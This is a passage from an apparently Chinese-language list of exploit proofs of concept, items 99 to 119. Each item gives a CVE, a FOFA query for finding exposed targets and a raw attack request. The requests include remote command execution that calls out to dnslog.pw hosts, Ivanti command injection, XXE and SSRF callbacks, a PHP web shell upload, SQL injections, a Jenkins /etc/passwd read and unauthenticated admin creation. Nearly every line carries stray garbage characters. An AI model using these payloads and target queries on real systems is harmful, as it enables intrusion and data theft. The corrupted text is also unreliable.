6 M3 ?0 X0 R3 u) Q" d4 P# M; iAccept: */*
% I) f( r; V9 k4 S: r1 q' wAccept-Encoding: gzip, deflate5 q% x. r5 C! l9 [0 D6 c  U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% X% O6 u7 [$ K6 d
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
. q8 m9 I# x  w! o. G3 a, [, B. wX-Requested-With: XMLHttpRequest# t2 u% L9 H+ @, _0 \7 ?) w) Q
# d5 d+ h" p$ ~0 L
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
6 z2 O" z. [: O) f
' l+ ]% w# ^& F7 w& Y0 F8 D2 v2 R9 d, L. K3 _2 H$ L
99. Ncast盈可视高清智能录播系统busiFacade RCE& l# j+ Z/ H6 T: e9 A
CVE-2024-0305
+ q, v; z( y3 ]& x( r" i: a- v# s! iFOFA:app="Ncast-产品" && title=="高清智能录播系统"0 J$ [7 e  E. r0 u2 `
POST /classes/common/busiFacade.php HTTP/1.1# ?; l* p3 R: {5 C+ j$ h4 a' P
Host: 192.168.40.130:8080: R' j  g! W- v6 Q; |. e7 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# ^- s1 ^- Y) j- K( f
Connection: close
3 U5 l9 T% o% G) JContent-Length: 154
" G% A* ^1 c7 K3 W% VAccept: */*
3 d3 C8 N! t2 b) l3 r/ w6 w( ]Accept-Encoding: gzip, deflate
' t& A8 `% M$ i$ x6 w' J' S/ U: _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 M& R/ e9 `; `. m& R# vContent-Type: application/x-www-form-urlencoded; charset=UTF-8
$ D1 N; h) Y( _1 J  h* f  P0 f# jX-Requested-With: XMLHttpRequest
5 S$ `2 O  Q4 Z  P4 e) f8 V4 w- n. Y4 v$ y" P
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D4 ~2 M7 m) y: z' P6 C, j( d; x
% S) B6 m- T" }$ x( b* R4 f$ b1 P! m, g

( u  X2 |  j9 {& k; \. A& h& I$ `100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传) k" W, D9 K) z' T" l7 g
CVE-2024-03528 y: u. t4 r3 W  w. M
FOFA:icon_hash="874152924". W% V# |9 q& L& A3 f
POST /api/file/formimage HTTP/1.1; G) X0 A/ J2 I
Host: 192.168.40.130' [  v; w  A4 \4 R# [# a  L
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.369 W7 V! y- v# ~$ S( _7 A
Connection: close
9 b% C9 s0 ]5 }: j: K6 nContent-Length: 201( W  ^# Y/ s$ d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei; V; c. p- V9 a8 k/ w
Accept-Encoding: gzip
  c( w& w4 q; i# b. k9 {/ b/ h+ G  V/ I& _+ H2 U( f. ]
------WebKitFormBoundarygcflwtei
6 L8 ?! c( n9 SContent-Disposition: form-data; name="file";filename="IE4MGP.php"
7 y! A! k3 w6 M" J. nContent-Type: application/x-php
/ I" Z6 D+ @5 z. B8 Z; c  x) q2 z& m( b" a
2ayyhRXiAsKXL8olvF5s4qqyI2O$ y9 {' ]- p( P' [
------WebKitFormBoundarygcflwtei--  _' b9 V, z' a0 f. T
( m/ f0 K9 |" N9 Y5 ]) a: V) }  K) d

) P( m. g: T, L8 B3 Z  o101. ivanti policy secure-22.6命令注入4 ~# M  ]% s/ u% A. S7 ~" a7 e7 n* L
CVE-2024-21887" M  q+ `7 Q3 H4 n2 C
FOFA:body="welcome.cgi?p=logo"
) q1 H7 ~! H. I- k* q! x+ ]GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.17 v! C/ ~' k7 |6 Q
Host: x.x.x.xx.x.x.x* v0 h/ j. S2 Y. W: t& P  U1 t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  U' c% D, T6 \! b7 lConnection: close
: L0 k1 X* l  c* P# G8 S* ]Accept-Encoding: gzip
- p5 B" G$ ?& K8 h6 B
* k8 z# o+ ~; G. e
4 [8 J) u; S5 h" E& \& R$ v: r102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
! V: M7 P# m/ l  vCVE-2024-21893! L3 A# A) z# B! Z
FOFA:body="welcome.cgi?p=logo"% E' Q; e( l8 G$ ^" P
POST /dana-ws/saml20.ws HTTP/1.1
; P) K5 y" U8 W$ W, THost: x.x.x.x
; s6 o. @8 y# @+ X. r& D7 d3 y! u* j2 O# NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 _% q! O+ R/ k4 C* J- r; PConnection: close8 }0 M. Q& A2 j$ U* c
Content-Length: 792% j3 u& m5 C5 ^+ g
Accept-Encoding: gzip
. ^" p0 W9 X7 R" v( e* \( n4 B. f1 F1 a3 D, m
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>. f" Z5 d; D4 E/ M5 d$ Y3 i7 G

, [/ K& ^6 F' y2 \. E103. Ivanti Pulse Connect Secure VPN XXE+ p; V7 J/ k. \2 `0 i9 H$ c5 u" _
CVE-2024-22024
3 Y* n+ }3 b( X1 ?! }# CFOFA:body="welcome.cgi?p=logo"6 q' ]) \! V5 p- S7 M
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
# r0 w3 k5 X0 L; {2 _, ~8 pHost: 192.168.40.130:111
: m6 m; U" r, y$ y/ `User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( `7 F* P1 k' [; U0 M& J; J! p" f
Connection: close
9 Y+ k4 l# Y6 D: V9 w# I5 eContent-Length: 204: C! W1 s5 n5 @; v9 k
Content-Type: application/x-www-form-urlencoded
' [# F# ^: _2 v+ A* ~Accept-Encoding: gzip, I/ g0 k9 P$ k5 ^, y* J

2 b5 @4 Z# S% _3 N1 N" mSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
) e/ ?- z9 z) F0 e
! M' q- {' x; R/ Z: E; u8 J+ _
& d& K# s' P  }- d其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
" W3 p# O: ~8 K+ X8 E& |<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
* D  y" \. l5 K0 {- k! Q
- d, \4 q8 o5 [$ u' Z2 k/ w- q4 ~) h" F: S3 ]0 D
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
" ?+ ~% B( a+ x  lCVE-2024-05692 x/ J9 G. O7 z- O
FOFA:title="TOTOLINK"
8 z. T* g' U: u6 F, D5 dPOST /cgi-bin/cstecgi.cgi HTTP/1.1( Z. N2 K' D6 y
Host:192.168.0.1- {  [0 G9 |4 {! n
Content-Length:41& w$ Q: Z/ R' W2 a0 |  a8 _/ h
Accept:application/json,text/javascript,*/*;q=0.011 U" p" q& Z0 w% y  X
X-Requested-with: XMLHttpRequest
$ O6 A- Q( |& Q* x- PUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36& j& f' o0 w& e$ d" _2 X
Content-Type: application/x-www-form-urlencoded:charset=UTF-8, P% u0 m3 @8 N& q# g  H/ B
Origin: http://192.168.0.1
/ M4 e& i. a  \& N6 M! cReferer: http://192.168.0.1/advance/index.html?time=1671152380564+ T; N$ g1 g. a4 v
Accept-Encoding:gzip,deflate) H2 E  M6 W( K" ?
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
% _. M' N# F7 l) y# f. kConnection:close" _! E0 K) D8 G" W$ L7 _4 U

6 [% X5 m! W; t{
7 }* J8 \2 o/ c+ D# z& u0 ]"topicurl":"getSysStatusCfg",
- c- ~* ~# q/ [" e5 h* x"token":""
5 J! {* i3 L  ?) Z, l% [) ]}+ _! W" z0 f! f  }0 o; s" h

. B) x/ q* Y2 O' c& s0 m. n" l# ~4 P/ U105. SpringBlade v3.2.0 export-user SQL 注入) \7 y) ?8 R- T# ~# h
FOFA:body="https://bladex.vip": k: z3 \. c7 P
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=12 L0 W+ P7 E) e! p

0 k$ v4 I) n* X& H9 ]% m106. SpringBlade dict-biz/list SQL 注入; Z! T* t2 A' _
FOFA:body="Saber 将不能正常工作"' L- M6 ?$ |8 g- N
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
2 V5 c2 E: }6 g7 cHost: your-ip
! N" V) x8 y( V) {. j; b7 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% @. u0 R- t$ P$ H1 cBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A* {8 ^) G% f5 W% q
Accept-Encoding: gzip, deflate
5 u# {$ I% C6 j# ~' ?) xAccept-Language: zh-CN,zh;q=0.9( ?1 l' x+ I0 e4 R1 V
Connection: close$ h. e, i& V% O+ K( u$ q* S7 Z
8 j( P6 h' m# f) s' p" K
% |% G4 q4 k! t- j! V
107. SpringBlade tenant/list SQL 注入
' P3 s) G; d( S5 g. D" ?* NFOFA:body="https://bladex.vip"8 X+ E" J7 }/ z) E
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.19 M, U7 M# g0 \
Host: your-ip
( R3 {  R# \2 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" V0 G( }* C+ v% f' g" V
Blade-Auth:替换为自己的
( t# X, i4 |; ~Connection: close+ j2 r8 v% ?" w2 C

/ e% j/ z2 {/ n/ F
' T) d6 q' p; }$ J* [' Z+ w0 I$ R4 D108. D-Tale 3.9.0 SSRF; X$ G" ?: |& }, z) f2 W, i
CVE-2024-21642
& S, |$ ?3 y7 [, p% P1 m: H% S1 n( `! j0 pFOFA:"dtale/static/images/favicon.png"$ Q, `* N1 h( c( G
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.13 _' ^- V3 ]1 o! W# d
Host: your-ip
( n+ d: A* f  N9 T( j, uAccept: application/json, text/plain, */*
* ?: F3 t3 J0 z( P5 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) C8 ~* X* m* q, [
Accept-Encoding: gzip, deflate
! N% J. ^, |( F4 wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8* b" t# k9 O5 G9 W" E# m8 }
Connection: close
; `( G, s8 b2 }9 `3 ~" J3 l3 j# C
* F% u+ m- Q7 h  n' ^# j: U
109. Jenkins CLI 任意文件读取! ^: V2 j! f" T# J) s
CVE-2024-23897
( j& P  K# D' ~/ H1 yFOFA:header="X-Jenkins"# U: F, J; _. D( x7 z# N/ W
POST /cli?remoting=false HTTP/1.1
( k% l+ b/ [& n2 x: U4 ~Host:
) V! Q* V9 L3 x9 ]0 FContent-type: application/octet-stream7 N" ]+ Q$ R( S0 C0 @
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
- z. v3 u7 s: i2 ~  nSide: upload7 [; S( K! D- ]+ H$ S8 R
Connection: keep-alive) R. c3 j- Z4 m$ K  g8 e3 y
Content-Length: 163
& f# i: Q9 @) F' Z% d- C6 Z
' X( w* Y4 {' n& g1 I8 O9 Qb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'. ]/ e; k; Z7 R# N. P3 m7 c$ P
% t& |8 N6 Q, t+ I

, ?* q9 X6 n; }8 M: }POST /cli?remoting=false HTTP/1.1# p; V1 F& @8 s1 a5 u  s/ n9 P
Host:
9 Q5 U8 c! u% c; G" D% }3 b! eSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
) x7 ?$ h0 g2 L- |; f! @download' }( T( O& T0 Z5 O4 e
Content-Type: application/x-www-form-urlencoded) {- K0 ^# _7 A/ n- a
Content-Length: 0
1 C& q3 U/ l( y7 J
( y0 A* V- T/ b* C5 x2 ?
3 p5 ^2 H& x' C' gERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
* n  r6 _# z; n* S* ujava -jar jenkins-cli.jar help
3 A, t2 t; l* q0 i3 k) l( R[COMMAND]
, K+ H  |, Q9 |& c* J6 k! ?3 {Lists all the available commands or a detailed description of single command.2 Q+ N4 d/ t" P# d
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)$ t8 U/ D9 e& p9 `
2 J" S+ V. a* q

3 ?! a' ?+ o1 m110. Goanywhere MFT 未授权创建管理员* \' Q5 I) [3 l  T
CVE-2024-0204
5 s3 g7 w$ p. S- y9 d2 [  e4 J+ hFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932". L* ^/ ^# U$ k+ x$ m6 D& a2 {- V
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1! A, Q3 u# F% ^( C  C
Host: 192.168.40.130:80001 @/ ?% W/ o$ L3 i$ @+ ?' Z' j
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36( Y5 I& b# |8 K) y% Z
Connection: close
& Z3 t4 }% E  W( ^1 |' nAccept: */*" l! S3 S% X" ?# f5 B8 i9 W6 q
Accept-Language: en
/ e# l2 Y7 ]8 F, m' s; ^/ L+ NAccept-Encoding: gzip- i$ s: g* ~) E$ j' x" b

9 ^. f  U- Q/ ~/ b# X5 u1 b/ w
3 i2 O  [  b8 z111. WordPress Plugin HTML5 Video Player SQL注入
5 e, i9 h" A0 S) mCVE-2024-1061
3 H6 t. G5 A. F) b7 fFOFA:"wordpress" && body="html5-video-player"
" z7 s3 B  X1 D2 eGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
; s% k, ]4 t% c& T# B3 W* ^Host: 192.168.40.130:112
3 x0 Q  `9 w/ ~+ r4 f- [2 LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.361 w8 P* o) V6 ?5 u' M
Connection: close
6 m) @* y1 Y/ K. }/ b1 h! h2 r9 f/ UAccept: */*) N' v1 q' m6 K$ L+ k. a
Accept-Language: en
4 k5 H3 s- y( I+ P; Z( }# z3 `Accept-Encoding: gzip
6 ^! {: Y9 M% v& A+ R. r9 _* ?$ o6 V1 R  d% n5 ~+ k- `
: r* F- F( {- r
112. WordPress Plugin NotificationX SQL 注入' ~  ~/ @$ E' N/ W
CVE-2024-1698% X* L% @& K* W) q1 G" F2 i6 |
FOFA:body="/wp-content/plugins/notificationx"
# a1 Z" y- N- G8 {1 ?3 HPOST /wp-json/notificationx/v1/analytics HTTP/1.1
+ u- u6 e' W( E8 bHost: {{Hostname}}0 F- q" |$ _% [, L$ Q
Content-Type: application/json: d! P; q5 T2 B0 r0 L8 P) t1 I
4 o& ~  j8 \, ~! M
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}& k6 u8 g, D) f( o5 e
" o3 _2 B% Y) T6 p% x# z

$ P6 F) V7 |9 f7 D# {$ r2 R0 O113. WordPress Automatic 插件任意文件下载和SSRF
# {, U/ N* U7 G) k6 M  D# eCVE-2024-27954
; F& g$ R' d; Z$ uFOFA:"/wp-content/plugins/wp-automatic"4 {5 P& ?" g2 z0 }5 g
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.11 \+ |+ R1 {$ D0 Y. U
Host: x.x.x.x# ]7 j' k" ?/ J0 H7 V* X2 g0 ?% ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
4 M' [. s$ Y7 R0 [1 S  b, uConnection: close
/ m% \* U2 C! D; }. t1 b7 zAccept: */*9 G6 @3 I- {# b- q) J3 T* U  C: U
Accept-Language: en
$ U: S  `' i1 x' w8 l. D9 TAccept-Encoding: gzip
9 K9 w1 t9 a$ |% W: s! Z
0 |! H$ V4 l' g& r6 [2 B, S7 @2 d( M
114. WordPress MasterStudy LMS插件 SQL注入2 r6 I7 V+ t9 \2 G& n* Y" [; ]
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
3 M# G; H% s) N5 R) _. M5 h% PGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.19 Z: z5 E$ D( c0 h
Host: your-ip
& x; Y- }  v5 Q; {, b$ nUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ c5 `/ O9 [, J$ J. M
Accept-Charset: utf-8# B* n' W# w0 ]2 l1 t
Accept-Encoding: gzip, deflate
) D7 W5 g/ w& `1 V/ h  ~& g+ U) B% E% B% qConnection: close+ e" o* R/ t8 l* \6 \2 s5 z

9 s7 |, X. Q7 ]- o9 T3 M' u) V9 u+ a+ t- f5 S! {' s  Z( t' r* K
115. WordPress Bricks Builder <= 1.9.6 RCE
- ^7 W$ |- g* I- C- ?1 c9 Z; @CVE-2024-25600
% O  A4 b' K( `9 ~; ]( iFOFA: body="/wp-content/themes/bricks/"& E: n" d7 H, l- Z1 b8 E3 Y' H/ O
第一步,获取网站的nonce值! v7 `. i8 ~# P
GET / HTTP/1.1+ L. O1 o2 z! Y  G+ ]
Host: x.x.x.x
# [! A, j; k) dUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
8 [# F. Y6 K" C- X, h  MConnection: close. T- D  y6 o- K- N7 V. E3 M
Accept-Encoding: gzip
$ C, L% K" ~, F2 a9 l6 L9 `+ t
# s1 ?5 X" [. _) j. M% x
% O' ~. D8 l2 I6 n& a( ?第二步替换nonce值,执行命令* U; g5 c3 c' F$ j( s
POST /wp-json/bricks/v1/render_element HTTP/1.1
9 s9 e0 k. C% Z6 ?Host: x.x.x.x  j. f1 o' s7 N9 y9 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ W7 K% P" ?7 \; x
Connection: close
( r( ^7 n5 q9 x: b! B- yContent-Length: 356
2 D6 n9 \" }3 h8 F# s  e' @% nContent-Type: application/json1 M. b  o& i$ N$ U; A( d+ M1 g$ N) k
Accept-Encoding: gzip( K/ n  C1 w( ^3 \- C

1 e; N1 B, S- e" \  I{
+ i( _2 z& C  z$ Y"postId": "1",7 K, e5 Y+ Q2 `: I) g* P4 q
  "nonce": "第一步获得的值",& [6 _8 {, f' |
  "element": {
8 Z; L: i: I* v6 W6 ]6 [    "name": "container",0 |: K" W: w/ m: y% W) c
    "settings": {
2 W2 X0 B, K3 C7 ~4 ^      "hasLoop": "true",, j5 L' m4 F, x8 M3 z# c# ]
      "query": {5 d6 y: D+ f& U! ~
        "useQueryEditor": true,
" C% ?0 [( N/ z        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",1 z0 n* |' z/ h0 n$ U, r+ ]
        "objectType": "post"
8 M, V# k* j& |7 h# r( H      }8 }. w+ i8 U" A
    }; n8 S" i: t- W+ _
  }
7 [/ }$ Y! o6 F- J) f/ `}; I& P  ]7 N4 c7 F1 p$ D; `; A
+ l6 C  s4 O! S* \* C! ~( x
0 n- S- |1 Q6 a0 b$ O$ Y# F! [
116. wordpress js-support-ticket文件上传# V( }( b. z" d& ^0 @$ k
FOFA:body="wp-content/plugins/js-support-ticket"
, U" B$ C, @+ nPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.11 v$ r0 h8 P& _. l' }" [
Host:
( p$ g( \! I( y6 [' g$ hContent-Type: multipart/form-data; boundary=--------767099171
  y( M0 K9 V, G' r8 yUser-Agent: Mozilla/5.0
* B# u: n  {( I1 [( O4 Q/ T8 P) v, G- J# R/ ?3 k+ M9 [( C
----------767099171: Z* Y8 Y+ T; S6 c- p* C+ Z  J/ x
Content-Disposition: form-data; name="action"
0 z5 X0 ?2 i5 l; k/ X- b! mconfiguration_saveconfiguration
9 }+ t4 S5 J( t+ G9 N" ]% B& h; m----------767099171
2 \/ g, A3 Q% \7 FContent-Disposition: form-data; name="form_request"# {* Z' ]/ D( ]. F' j
jssupportticket$ c* W! E7 D" d. L) u
----------767099171
5 Q- E; r! j1 P3 D& v5 ^Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"! {. H7 N3 F5 R
Content-Type: image/png
' e2 T8 B  Z5 ]0 z# G$ l% Q% R4 [----------767099171--% `6 u; B! ~2 _1 f4 k
% b* F8 O+ r. w3 V9 N. ?

# S+ U* H9 L; s4 e. w9 a; G% y117. WordPress LayerSlider插件SQL注入0 w8 r. Q2 G* s6 U$ d) y3 J
version:7.9.11 – 7.10.0" B( [4 o: w9 J% |; |* E
FOFA:body="/wp-content/plugins/LayerSlider/"
) b, _) {$ U1 L5 IGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
3 d8 A; G9 z" N$ O5 s8 @Host: your-ip7 V( r2 ^4 s1 V5 P# e+ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 n2 I7 s" \6 Q2 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  U) z  V& H$ E& V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" g( q$ x. }2 a" T
Accept-Encoding: gzip, deflate, br
' _9 @9 `. d5 X5 a; M  ZConnection: close! @* |1 X. t: f+ _+ d
Upgrade-Insecure-Requests: 1- e3 [' B# A  F& [* P) ^

: d) A* B* M1 W5 p2 }& A& U: X6 v
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ W. w2 D* m) n& a7 U8 UCVE-2024-09393 o3 o# |7 i" U* r0 W3 |
FOFA:title="Smart管理平台"! v6 z: k  v) o) C* R
POST /Tool/uploadfile.php? HTTP/1.1) G" S3 d+ ]4 l6 w2 ~  ?" x
Host: 192.168.40.130:8443" g9 `7 P  ?& k$ K4 \
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f82 h  Q0 d3 R. {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.09 U; R6 H, K+ t" s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 j( P, D9 b( |" p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ a; Y" }% @" }/ j6 D0 T5 j6 cAccept-Encoding: gzip, deflate
0 J3 r' r, A3 R( J8 |- ~4 M% YContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
( @4 v( ?6 ^2 g! H2 ]2 t) fContent-Length: 405) b6 u( ]& b" B+ q1 f
Origin: https://192.168.40.130:8443) a8 A3 f* R" S  c! c
Referer: https://192.168.40.130:8443/Tool/uploadfile.php& v/ l$ v- b% o: E1 @5 o# J4 v
Upgrade-Insecure-Requests: 1; V& n; U9 G) W3 n, k! F
Sec-Fetch-Dest: document
* j# n2 F% n, K6 t/ eSec-Fetch-Mode: navigate
3 f1 T8 i. {. F) m2 U0 p( L( gSec-Fetch-Site: same-origin. J1 w9 r0 ~1 c1 D: B
Sec-Fetch-User: ?12 f: e. q* e, B' f, N
Te: trailers( g0 M! [1 P9 H" o* ~2 z  g' D
Connection: close
2 S: T0 T4 d, k1 \. W. d* g1 S& w* y- {8 p2 \3 M& P
-----------------------------13979701222747646634037182887
" l9 u* o8 k: B7 d% BContent-Disposition: form-data; name="file_upload"; filename="contents.php"
4 N4 S+ h& ^* n, j: g& M- E+ [8 RContent-Type: application/octet-stream' D& @3 a7 m' h& e1 q3 ?

$ D$ M9 g- c$ B<?php
; b6 D& w/ v" [4 Ksystem($_POST["passwd"]);
9 z9 u& J! ^6 F7 n; B6 o?>
1 x# k$ Z1 q/ w* x4 X- u, O) s4 ]( u-----------------------------13979701222747646634037182887& l! H- v  P. q* ^( _
Content-Disposition: form-data; name="txt_path"+ ^7 Y* [" q) k5 y) o+ y
+ U" Z& o, x  ~" |
/home/src.php
+ N! [8 U+ f$ R% V-----------------------------13979701222747646634037182887--' U8 Q& A/ U( u  l2 k" N

. X; |+ A1 @2 Y- j0 L
1 N) r; U4 B4 ]' U# R5 e' Z访问/home/src.php9 @  Q( j7 o# l! w( e

( H& j( R' `$ R119. 北京百绰智能S20后台sysmanageajax.php sql注入* g2 H0 f' Z4 A+ P& r/ H+ R
CVE-2024-1254: n- W' w& F. D6 J, o) W: i
FOFA:title="Smart管理平台"
* o# x0 b& |# W先登录进入系统,默认账号密码为admin/admin# t4 `/ o: l' [2 S+ O" q
POST /sysmanage/sysmanageajax.php HTTP/1.11( ?6 C& F: A- Y0 m# ]
Host: x.x.x.x/ Y) Y( l* J$ f. G( }' k
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee/ U6 v2 O" G8 q% O4 E9 o% K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
% c  S5 t& J2 [6 aAccept: */*$ ]4 \4 B. _) C0 @# h; _$ _4 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% E$ W- l- R3 E1 L! n8 p* w" jAccept-Encoding: gzip, deflate. j) Z- V3 ]% ^) C& T, T
Content-Type: application/x-www-form-urlencoded;
, }5 e; n6 ~9 ]5 M9 KContent-Length: 109' \6 }0 n5 F) |: J
Origin: https://58.18.133.60:8443* P( L9 U- T1 B
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php8 `. G4 L  n$ D3 ]+ U
Sec-Fetch-Dest: empty9 w1 M5 Y' F  P8 D
